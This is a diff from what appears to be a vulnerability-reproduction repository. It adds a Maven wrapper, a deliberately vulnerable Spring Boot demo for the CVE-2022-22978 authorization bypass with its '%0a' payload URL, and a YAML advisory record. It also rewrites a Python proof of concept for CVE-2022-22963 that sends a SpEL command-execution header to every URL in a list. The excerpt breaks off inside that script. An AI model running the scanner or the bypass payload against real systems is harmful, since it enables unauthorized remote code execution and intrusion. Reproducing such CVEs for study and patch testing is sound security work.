+      fi
+    fi
+    ;;
+esac
+
+if [ -z "$JAVA_HOME" ] ; then
+  if [ -r /etc/gentoo-release ] ; then
+    JAVA_HOME=`java-config --jre-home`
+  fi
+fi
+
+if [ -z "$M2_HOME" ] ; then
+  ## resolve links - $0 may be a link to maven's home
+  PRG="$0"
+
+  # need this for relative symlinks
+  while [ -h "$PRG" ] ; do
+    ls=`ls -ld "$PRG"`
+    link=`expr "$ls" : '.*-> \(.*\)$'`
+    if expr "$link" : '/.*' > /dev/null; then
+      PRG="$link"
+    else
+      PRG="`dirname "$PRG"`/$link"
+    fi
+  done
+
+  saveddir=`pwd`
+
+  M2_HOME=`dirname "$PRG"`/..
+
+  # make it fully qualified
+  M2_HOME=`cd "$M2_HOME" && pwd`
+
+  cd "$saveddir"
+  # echo Using m2 at $M2_HOME
+fi
+
+# For Cygwin, ensure paths are in UNIX format before anything is touched
+if $cygwin ; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME=`cygpath --unix "$M2_HOME"`
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
+  [ -n "$CLASSPATH" ] &&
+    CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
+fi
+
+# For Mingw, ensure paths are in UNIX format before anything is touched
+if $mingw ; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME="`(cd "$M2_HOME"; pwd)`"
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
+fi
+
+if [ -z "$JAVA_HOME" ]; then
+  javaExecutable="`which javac`"
+  if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
+    # readlink(1) is not available as standard on Solaris 10.
+    readLink=`which readlink`
+    if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
+      if $darwin ; then
+        javaHome="`dirname \"$javaExecutable\"`"
+        javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
+      else
+        javaExecutable="`readlink -f \"$javaExecutable\"`"
+      fi
+      javaHome="`dirname \"$javaExecutable\"`"
+      javaHome=`expr "$javaHome" : '\(.*\)/bin'`
+      JAVA_HOME="$javaHome"
+      export JAVA_HOME
+    fi
+  fi
+fi
+
+if [ -z "$JAVACMD" ] ; then
+  if [ -n "$JAVA_HOME"  ] ; then
+    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+      # IBM's JDK on AIX uses strange locations for the executables
+      JAVACMD="$JAVA_HOME/jre/sh/java"
+    else
+      JAVACMD="$JAVA_HOME/bin/java"
+    fi
+  else
+    JAVACMD="`\\unset -f command; \\command -v java`"
+  fi
+fi
+
+if [ ! -x "$JAVACMD" ] ; then
+  echo "Error: JAVA_HOME is not defined correctly." >&2
+  echo "  We cannot execute $JAVACMD" >&2
+  exit 1
+fi
+
+if [ -z "$JAVA_HOME" ] ; then
+  echo "Warning: JAVA_HOME environment variable is not set."
+fi
+
+CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
+
+# traverses directory structure from process work directory to filesystem root
+# first directory with .mvn subdirectory is considered project base directory
+find_maven_basedir() {
+
+  if [ -z "$1" ]
+  then
+    echo "Path not specified to find_maven_basedir"
+    return 1
+  fi
+
+  basedir="$1"
+  wdir="$1"
+  while [ "$wdir" != '/' ] ; do
+    if [ -d "$wdir"/.mvn ] ; then
+      basedir=$wdir
+      break
+    fi
+    # workaround for JBEAP-8937 (on Solaris 10/Sparc)
+    if [ -d "${wdir}" ]; then
+      wdir=`cd "$wdir/.."; pwd`
+    fi
+    # end of workaround
+  done
+  echo "${basedir}"
+}
+
+# concatenates all lines of a file
+concat_lines() {
+  if [ -f "$1" ]; then
+    echo "$(tr -s '\n' ' ' < "$1")"
+  fi
+}
+
+BASE_DIR=`find_maven_basedir "$(pwd)"`
+if [ -z "$BASE_DIR" ]; then
+  exit 1;
+fi
+
+##########################################################################################
+# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+# This allows using the maven wrapper in projects that prohibit checking in binary data.
+##########################################################################################
+if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Found .mvn/wrapper/maven-wrapper.jar"
+    fi
+else
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
+    fi
+    if [ -n "$MVNW_REPOURL" ]; then
+      jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+    else
+      jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+    fi
+    while IFS="=" read key value; do
+      case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
+      esac
+    done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Downloading from: $jarUrl"
+    fi
+    wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
+    if $cygwin; then
+      wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
+    fi
+
+    if command -v wget > /dev/null; then
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Found wget ... using wget"
+        fi
+        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
+            wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
+        else
+            wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
+        fi
+    elif command -v curl > /dev/null; then
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Found curl ... using curl"
+        fi
+        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
+            curl -o "$wrapperJarPath" "$jarUrl" -f
+        else
+            curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
+        fi
+
+    else
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Falling back to using Java to download"
+        fi
+        javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
+        # For Cygwin, switch paths to Windows format before running javac
+        if $cygwin; then
+          javaClass=`cygpath --path --windows "$javaClass"`
+        fi
+        if [ -e "$javaClass" ]; then
+            if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+                if [ "$MVNW_VERBOSE" = true ]; then
+                  echo " - Compiling MavenWrapperDownloader.java ..."
+                fi
+                # Compiling the Java class
+                ("$JAVA_HOME/bin/javac" "$javaClass")
+            fi
+            if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+                # Running the downloader
+                if [ "$MVNW_VERBOSE" = true ]; then
+                  echo " - Running MavenWrapperDownloader.java ..."
+                fi
+                ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
+            fi
+        fi
+    fi
+fi
+##########################################################################################
+# End of extension
+##########################################################################################
+
+export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
+if [ "$MVNW_VERBOSE" = true ]; then
+  echo $MAVEN_PROJECTBASEDIR
+fi
+MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
+
+# For Cygwin, switch paths to Windows format before running java
+if $cygwin; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME=`cygpath --path --windows "$M2_HOME"`
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
+  [ -n "$CLASSPATH" ] &&
+    CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
+  [ -n "$MAVEN_PROJECTBASEDIR" ] &&
+    MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
+fi
+
+# Provide a "standardized" way to retrieve the CLI args that will
+# work with both Windows and non-Windows executions.
+MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
+export MAVEN_CMD_LINE_ARGS
+
+WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+exec "$JAVACMD" \
+  $MAVEN_OPTS \
+  $MAVEN_DEBUG_OPTS \
+  -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
+  "-Dmaven.home=${M2_HOME}" \
+  "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
+  ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd
new file mode 100644
index 00000000..1d8ab018
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd
@@ -0,0 +1,188 @@
+@REM ----------------------------------------------------------------------------
+@REM Licensed to the Apache Software Foundation (ASF) under one
+@REM or more contributor license agreements.  See the NOTICE file
+@REM distributed with this work for additional information
+@REM regarding copyright ownership.  The ASF licenses this file
+@REM to you under the Apache License, Version 2.0 (the
+@REM "License"); you may not use this file except in compliance
+@REM with the License.  You may obtain a copy of the License at
+@REM
+@REM    https://www.apache.org/licenses/LICENSE-2.0
+@REM
+@REM Unless required by applicable law or agreed to in writing,
+@REM software distributed under the License is distributed on an
+@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+@REM KIND, either express or implied.  See the License for the
+@REM specific language governing permissions and limitations
+@REM under the License.
+@REM ----------------------------------------------------------------------------
+
+@REM ----------------------------------------------------------------------------
+@REM Maven Start Up Batch script
+@REM
+@REM Required ENV vars:
+@REM JAVA_HOME - location of a JDK home dir
+@REM
+@REM Optional ENV vars
+@REM M2_HOME - location of maven2's installed home dir
+@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
+@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
+@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
+@REM     e.g. to debug Maven itself, use
+@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+@REM ----------------------------------------------------------------------------
+
+@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
+@echo off
+@REM set title of command window
+title %0
+@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
+@if "%MAVEN_BATCH_ECHO%" == "on"  echo %MAVEN_BATCH_ECHO%
+
+@REM set %HOME% to equivalent of $HOME
+if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
+
+@REM Execute a user defined script before this one
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
+@REM check for pre script, once with legacy .bat ending and once with .cmd ending
+if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %*
+if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %*
+:skipRcPre
+
+@setlocal
+
+set ERROR_CODE=0
+
+@REM To isolate internal variables from possible post scripts, we use another setlocal
+@setlocal
+
+@REM ==== START VALIDATION ====
+if not "%JAVA_HOME%" == "" goto OkJHome
+
+echo.
+echo Error: JAVA_HOME not found in your environment. >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+:OkJHome
+if exist "%JAVA_HOME%\bin\java.exe" goto init
+
+echo.
+echo Error: JAVA_HOME is set to an invalid directory. >&2
+echo JAVA_HOME = "%JAVA_HOME%" >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+@REM ==== END VALIDATION ====
+
+:init
+
+@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
+@REM Fallback to current working directory if not found.
+
+set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
+IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
+
+set EXEC_DIR=%CD%
+set WDIR=%EXEC_DIR%
+:findBaseDir
+IF EXIST "%WDIR%"\.mvn goto baseDirFound
+cd ..
+IF "%WDIR%"=="%CD%" goto baseDirNotFound
+set WDIR=%CD%
+goto findBaseDir
+
+:baseDirFound
+set MAVEN_PROJECTBASEDIR=%WDIR%
+cd "%EXEC_DIR%"
+goto endDetectBaseDir
+
+:baseDirNotFound
+set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
+cd "%EXEC_DIR%"
+
+:endDetectBaseDir
+
+IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
+
+@setlocal EnableExtensions EnableDelayedExpansion
+for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
+@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
+
+:endReadAdditionalConfig
+
+SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
+set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
+set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+
+FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
+    IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
+)
+
+@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
+if exist %WRAPPER_JAR% (
+    if "%MVNW_VERBOSE%" == "true" (
+        echo Found %WRAPPER_JAR%
+    )
+) else (
+    if not "%MVNW_REPOURL%" == "" (
+        SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+    )
+    if "%MVNW_VERBOSE%" == "true" (
+        echo Couldn't find %WRAPPER_JAR%, downloading it ...
+        echo Downloading from: %DOWNLOAD_URL%
+    )
+
+    powershell -Command "&{"^
+		"$webclient = new-object System.Net.WebClient;"^
+		"if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
+		"$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
+		"}"^
+		"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
+		"}"
+    if "%MVNW_VERBOSE%" == "true" (
+        echo Finished downloading %WRAPPER_JAR%
+    )
+)
+@REM End of extension
+
+@REM Provide a "standardized" way to retrieve the CLI args that will
+@REM work with both Windows and non-Windows executions.
+set MAVEN_CMD_LINE_ARGS=%*
+
+%MAVEN_JAVA_EXE% ^
+  %JVM_CONFIG_MAVEN_PROPS% ^
+  %MAVEN_OPTS% ^
+  %MAVEN_DEBUG_OPTS% ^
+  -classpath %WRAPPER_JAR% ^
+  "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^
+  %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
+if ERRORLEVEL 1 goto error
+goto end
+
+:error
+set ERROR_CODE=1
+
+:end
+@endlocal & set ERROR_CODE=%ERROR_CODE%
+
+if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost
+@REM check for post script, once with legacy .bat ending and once with .cmd ending
+if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat"
+if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd"
+:skipRcPost
+
+@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
+if "%MAVEN_BATCH_PAUSE%"=="on" pause
+
+if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE%
+
+cmd /C exit /B %ERROR_CODE%
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/pom.xml b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml
new file mode 100644
index 00000000..861fa8cf
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml
@@ -0,0 +1,68 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.7.0</version>
+        <relativePath/> <!-- lookup parent from repository -->
+    </parent>
+    <groupId>cc.saferoad</groupId>
+    <artifactId>CVE-2022-22978</artifactId>
+    <version>0.0.1-SNAPSHOT</version>
+    <packaging>jar</packaging>
+    <name>CVE-2022-22978</name>
+    <description>CVE-2022-22978</description>
+    <properties>
+        <java.version>1.8</java.version>
+        <spring-security.version>5.6.3</spring-security.version>
+    </properties>
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-tomcat</artifactId>
+            <scope>provided</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-security</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-thymeleaf</artifactId>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+                <configuration>
+                    <jvmArguments>
+                        -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989
+                    </jvmArguments>
+                </configuration>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <configuration>
+                    <testFailureIgnore>true</testFailureIgnore>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
new file mode 100644
index 00000000..2415af49
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
@@ -0,0 +1,16 @@
+package cc.saferoad.config;
+
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
+
+@Configuration
+@EnableWebSecurity
+public class SpringSecurityConfig extends WebSecurityConfigurerAdapter {
+
+    @Override
+    protected void configure(HttpSecurity httpSecurity) throws Exception{
+        httpSecurity.authorizeRequests().regexMatchers("/admin/.*").authenticated();
+    }
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
new file mode 100644
index 00000000..f32b5613
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
@@ -0,0 +1,21 @@
+package cc.saferoad.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+/*@RestController*/
+@Controller
+public class Demo {
+    @GetMapping("/admin/*")
+    public String Manage(){
+        /*return "Manage page";*/
+        return "manage";
+    }
+
+    @GetMapping("/")
+    public String User(){
+       /* return "Hello bro";*/
+        return "index";
+    }
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
new file mode 100644
index 00000000..cc5f37e2
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
@@ -0,0 +1,13 @@
+package cc.saferoad.cve202222978;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication(scanBasePackages = {"cc.saferoad"})
+public class Cve202222978Application {
+
+    public static void main(String[] args) {
+        SpringApplication.run(Cve202222978Application.class, args);
+    }
+
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
new file mode 100644
index 00000000..08cf3001
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
@@ -0,0 +1,15 @@
+package cc.saferoad.cve202222978;
+
+import org.springframework.boot.builder.SpringApplicationBuilder;
+import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
+import org.springframework.context.annotation.ComponentScan;
+
+@ComponentScan(basePackages = {"cc.saferoad"})
+public class ServletInitializer extends SpringBootServletInitializer {
+
+    @Override
+    protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
+        return application.sources(Cve202222978Application.class);
+    }
+
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
@@ -0,0 +1 @@
+
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
new file mode 100644
index 00000000..682abdc5
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>CVE-2022-22978</title>
+</head>
+<body>
+<h3>
+    CVE-2022-22978 Demo via Spring security 5.6.3<br/>
+    Manage page: <a href="/admin/index">/admin/index</a><br/>
+Payload: http://localhost:8080/admin/index%0a
+</h3>
+</body>
+</html>
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html
new file mode 100644
index 00000000..eeb40f2a
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>Manage</title>
+</head>
+<body>
+<h3>This is manage page</h3>
+</body>
+</html>
\ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
new file mode 100644
index 00000000..f24ec389
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
@@ -0,0 +1,13 @@
+package cc.saferoad.cve202222978;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202222978ApplicationTests {
+
+    @Test
+    void contextLoads() {
+    }
+
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
new file mode 100644
index 00000000..864b8573
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
@@ -0,0 +1,17 @@
+package cc.saferoad.cve202222978;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.mock.web.MockHttpServletRequest;
+import org.springframework.security.web.util.matcher.RegexRequestMatcher;
+import static org.assertj.core.api.Assertions.assertThat;
+
+public class RegexRequestMatcherTests {
+
+    @Test
+    public void matchesWithLineFeed() {
+        RegexRequestMatcher matcher = new RegexRequestMatcher(".*", null);
+        MockHttpServletRequest request = new MockHttpServletRequest("GET", "/blah%0d");
+        request.setServletPath("/blah\r");
+        assertThat(matcher.matches(request)).isTrue();
+    }
+}
diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml
new file mode 100644
index 00000000..d24bc4c4
--- /dev/null
+++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml
@@ -0,0 +1,22 @@
+id: CVE-2022-22978 
+source: 
+  https://github.com/DeEpinGh0st/CVE-2022-22978
+info:
+  name: Authorization Bypass in RegexRequestMatcher of Spring Security
+  severity: critical
+  description: |
+    在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时，攻击者可以通过构造恶意数据包绕过身份认证
+  scope-of-influence:
+    Spring Security 5.5.x prior to 5.5.75.5.6
+    Spring Security 5.6.x prior to 5.6.45.6.3
+    Spring Security Earlier unsupported versions
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22978
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22978
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, spring-security
\ No newline at end of file
diff --git a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
index fde21239..2932dc34 100644
--- a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
+++ b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
@@ -1,59 +1,59 @@
-import requests
-import sys
-import threading
-import urllib3
-urllib3.disable_warnings()
-
-
-def scan(txt,cmd):
-
-    payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")'
-
-    data ='test'
-    headers = {
-        'spring.cloud.function.routing-expression':payload,
-        'Accept-Encoding': 'gzip, deflate',
-        'Accept': '*/*',
-        'Accept-Language': 'en',
-        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
-        'Content-Type': 'application/x-www-form-urlencoded'
-    }
-    path = '/functionRouter'
-    f = open(txt)
-    urllist=f.readlines()
-
-    for  url  in  urllist :
-        url = url.strip('\n')
-        all = url + path
-        try:
-            req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3)
-            code =req.status_code
-            text = req.text
-            rsp = '"error":"Internal Server Error"'
-
-            if code == 500 and rsp in text:
-                print ( f'[+] { url } is vulnerable' )
-                poc_file = open('vulnerable.txt', 'a+')
-                poc_file.write(url + '\n')
-                poc_file.close()
-            else:
-                print ( f'[-] { url } not vulnerable' )
-
-        except requests.exceptions.RequestException:
-            print ( f'[-] { url } detection timed out' )
-            continue
-        except:
-            print ( f'[-] { url } error' )
-            continue
-
-
-
-if __name__ == '__main__' :
-    try:
-        cmd1 =sys.argv[1]
-        t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) 
-        t.start()
-    except:
-        print ( 'Usage:' )
-        print('python poc.py url.txt')
+import requests
+import sys
+import threading
+import urllib3
+urllib3.disable_warnings()
+
+
+def scan(txt,cmd):
+
+    payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")'
+
+    data ='test'
+    headers = {
+        'spring.cloud.function.routing-expression':payload,
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept': '*/*',
+        'Accept-Language': 'en',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+    path = '/functionRouter'
+    f = open(txt)
+    urllist=f.readlines()
+
+    for  url  in  urllist :
+        url = url.strip('\n')
+        all = url + path
+        try:
+            req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3)
+            code =req.status_code
+            text = req.text
+            rsp = '"error":"Internal Server Error"'
+
+            if code == 500 and rsp in text:
+                print ( f'[+] { url } is vulnerable' )
+                poc_file = open('vulnerable.txt', 'a+')
+                poc_file.write(url + '\n')
